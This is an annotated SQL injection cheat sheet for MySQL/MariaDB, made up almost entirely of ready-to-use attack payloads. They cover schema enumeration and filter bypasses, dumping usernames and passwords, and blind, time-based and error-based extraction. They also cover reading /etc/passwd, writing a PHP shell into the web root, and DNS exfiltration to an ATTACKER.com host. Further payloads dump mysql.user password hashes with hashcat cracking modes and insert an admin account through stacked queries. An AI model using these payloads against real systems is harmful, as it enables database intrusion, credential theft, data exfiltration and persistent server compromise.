
Identification (confirm the backend is MySQL/MariaDB before using the MySQL-specific payloads below)

SELECT @@version
SELECT version()
-- Comment: # or -- - or /* */   ('--' only starts a comment when followed by whitespace, hence '-- -'; '#' is MySQL-only; /*!50000 ... */ version comments are executed by MySQL and ignored by other engines)
-- String concat: CONCAT('a','b') or 'a' 'b'   (adjacent literals are joined; CONCAT returns NULL if any argument is NULL, CONCAT_WS skips NULLs)

Information Gathering

-- Who/where am I: each works inside a UNION column or subselect
SELECT database()      -- current schema (NULL when the connection has no default database selected)
SELECT user()          -- 'user@host' as supplied by the client; CURRENT_USER() shows the account the server actually matched
SELECT @@hostname      -- server hostname
SELECT @@datadir       -- data directory: likely target for LOAD_FILE / INTO OUTFILE
SELECT @@basedir       -- install prefix

Enumerate Databases

SELECT schema_name FROM information_schema.schemata
SELECT group_concat(schema_name) FROM information_schema.schemata   -- single-row form for UNION injection; output is capped at group_concat_max_len (default 1024 chars), so a short-looking list may be truncated

Enumerate Tables

SELECT table_name FROM information_schema.tables WHERE table_schema=database()
SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='dbname'   -- quote-free alternatives: table_schema=database() or a hex literal (table_schema=0x...); group_concat truncates at group_concat_max_len

Without information_schema (MySQL 5.6+, InnoDB tables only; needs read access to the mysql schema)

-- Fallback when 'information_schema' is filtered; only InnoDB tables appear here and the account needs SELECT on mysql.*
SELECT table_name FROM mysql.innodb_table_stats WHERE database_name=database()

Enumerate Columns

SELECT column_name FROM information_schema.columns WHERE table_name='users'   -- no schema filter: also returns columns of any other schema's 'users' table; add table_schema=database() (as below) to avoid noise
SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name='users' AND table_schema=database()

Dump Data

SELECT group_concat(username,0x3a,password) FROM users   -- 0x3a = ':' so no quote is needed; one row, but truncated at group_concat_max_len (default 1024): page with LIMIT/OFFSET or SUBSTRING if the dump looks short
SELECT group_concat(username,':',password SEPARATOR '\n') FROM users   -- needs quotes; a NULL password makes the concatenated value NULL and group_concat skips NULLs — wrap in IFNULL(password,'') to keep those rows

String Functions

| Function | Description |
|---|---|
| CONCAT(a,b) | Concatenate (NULL if any argument is NULL) |
| CONCAT_WS(':',a,b) | Concat with separator (NULL arguments are skipped) |
| GROUP_CONCAT(a) | Aggregate concat (truncated at group_concat_max_len, default 1024) |
| SUBSTRING(str,pos,len) | Substring (pos is 1-based) |
| MID(str,pos,len) | Same as SUBSTRING |
| LEFT(str,n) | Left N chars |
| RIGHT(str,n) | Right N chars |
| LENGTH(str) | String length in bytes (CHAR_LENGTH for characters) |
| ASCII(char) | ASCII value of the first character |
| ORD(char) | Same as ASCII for single-byte characters |
| CHAR(n) | Char from ASCII |
| HEX(str) | Hex encode |
| UNHEX(hex) | Hex decode |
| REVERSE(str) | Reverse string |

Conditional

-- Blind-injection building blocks: put the probe in `condition` and branch to a delay (SLEEP) or an error
IF(condition, true_val, false_val)                    -- MySQL-specific
CASE WHEN condition THEN true_val ELSE false_val END  -- portable form; use when IF() is filtered
IFNULL(expr, alt)                                     -- alt when expr is NULL (COALESCE is the portable equivalent)

Time Delay

SLEEP(5)   -- pauses 5 s for every row that evaluates it: in a WHERE clause the total delay scales with the number of matching rows
BENCHMARK(10000000, SHA1('test'))   -- CPU-bound fallback when SLEEP() is filtered; the delay depends on server load, so calibrate the iteration count first

File Read

SELECT LOAD_FILE('/etc/passwd')   -- needs the FILE privilege and a permitting secure_file_priv; returns NULL (no error) when the file is unreadable by the mysqld OS user, outside secure_file_priv, or larger than max_allowed_packet
SELECT LOAD_FILE(0x2f6574632f706173737764)    -- Hex path: same file without quote characters

File Write

-- Both need the FILE privilege, a non-NULL secure_file_priv, and a directory the mysqld OS user can write; the target file must not already exist
SELECT 'data' INTO OUTFILE '/var/www/html/shell.php'   -- OUTFILE applies text-export escaping and line terminators, so bytes may be altered
SELECT 'data' INTO DUMPFILE '/var/www/html/shell.php'  -- DUMPFILE writes the single value verbatim: use it for binaries or exact PHP
Check the write restriction and privilege first (secure_file_priv: NULL = file I/O disabled, '' = unrestricted, a path = only inside that directory):
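SELECT @@secure_file_priv   -- NULL: file read/write disabled; '': unrestricted; a path: only inside that directory
SHOW GRANTS                 -- confirm the current account holds FILE (or ALL PRIVILEGES); without it LOAD_FILE returns NULL and INTO OUTFILE/DUMPFILE fail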

DNS Exfiltration (Windows hosts; needs the FILE privilege)

-- Windows-only UNC trick: the server resolves the host part, so the label before .ATTACKER.com leaves via DNS regardless of what LOAD_FILE returns
-- '\\\\' in a MySQL literal is two backslashes; a DNS label is limited to 63 hostname-safe chars, so HEX() the value and split it across queries if it is long
SELECT LOAD_FILE(CONCAT('\\\\',database(),'.ATTACKER.com\\x'))

Error-Based

-- MySQL 5.1+: the XPath error echoes the text after '~' (0x7e) but only the first 32 chars — page long values with SUBSTRING((QUERY),1,32), then 33,64 ...
extractvalue(1,concat(0x7e,(QUERY)))
updatexml(1,concat(0x7e,(QUERY)),1)
-- Duplicate-key trick: rand(0) is deterministic, so the GROUP BY key collides and the "Duplicate entry" error leaks (QUERY); (QUERY) must return one value and the FROM table needs at least 3 rows
(SELECT 1 FROM (SELECT count(*),concat((QUERY),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Password Hashes

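-- Reading mysql.user needs SELECT on the mysql schema (typically only root-like accounts)
SELECT user,authentication_string FROM mysql.user        -- MySQL 5.7+
SELECT user,plugin,authentication_string FROM mysql.user -- MySQL 5.7+/8.0: `plugin` tells you the hash format (mysql_native_password = '*' + 40 hex; caching_sha2_password = '$A$005$...'), which decides the cracking mode
SELECT user,password FROM mysql.user                     -- MySQL 5.6-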
Crack: mysql_native_password hashes ('*' + 40 hex, MySQL 4.1 and later including 5.x) are hashcat -m 300; the old 16-hex pre-4.1 format is -m 200 (MySQL323); MySQL 8 caching_sha2_password hashes ('$A$005$...') are -m 7401.

Stacked Queries

Only when the application's driver accepts several statements in one call — e.g. mysqli_multi_query(), or PDO's MySQL driver, which allows multiple statements by default (plain mysqli_query()/mysql_query() do not):
-- Payload fragment: the leading quote closes the application's string literal; the VALUES list must match the table's column count and order (take both from the column enumeration), or name the columns explicitly after the table name
'; INSERT INTO users VALUES('hack','pass','admin');-- -

Useful Operators

-- LIKE wildcard: % matches any run of characters, _ exactly one; case-insensitive under the usual *_ci collations, so useful for blind char-by-char probes
SELECT * FROM users WHERE username LIKE 'adm%'

-- REGEXP (alias RLIKE): anchored pattern matching; an invalid pattern raises an error, which can itself be used as an oracle
SELECT * FROM users WHERE username REGEXP '^admin'

-- IN: compact form of an OR list
SELECT * FROM users WHERE id IN (1,2,3)

-- BETWEEN: inclusive at both ends (1 and 10 both match); handy for binary-search extraction on ASCII(SUBSTRING(...))
SELECT * FROM users WHERE id BETWEEN 1 AND 10

Sources